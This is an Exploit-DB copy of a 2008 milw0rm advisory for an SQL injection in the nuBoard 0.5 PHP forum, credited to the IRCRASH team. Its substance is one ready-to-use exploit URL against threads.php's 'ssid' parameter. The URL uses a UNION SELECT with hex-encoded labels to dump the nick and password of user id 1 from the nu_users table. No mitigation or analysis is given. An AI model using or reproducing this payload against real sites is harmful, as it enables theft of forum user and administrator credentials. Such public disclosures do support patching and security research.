nuBoard 0.5 - 'ssid' SQL Injection

EDB-ID:

5115




Platform:

PHP

Date:

2008-02-14


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#####################################################################################
####                Nuboard_v0.5 SQL Injection Vulnerability                     ####
####                               By IRCRASH                                    ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH                                                                   #
#Discovered by : Dr.Crash                                                           #
#Exploited By : Dr.Crash                                                            #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                               #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Script Download : http://switch.dl.sourceforge.net/sourceforge/nuboard/nuboard_v0.5.tar.gz
#                                                                                   #
#####################################################################################
#                                   < SQL >                                         #
#SQL Address : http://Target/threads.php?ssid=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,nick,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/***/from/**/nu_users/**/where/**/id=1/*
#                                                                                   #
#####################################################################################
#                         Our site : Http://IRCRASH.COM                             #
#####################################################################################

# milw0rm.com [2008-02-14]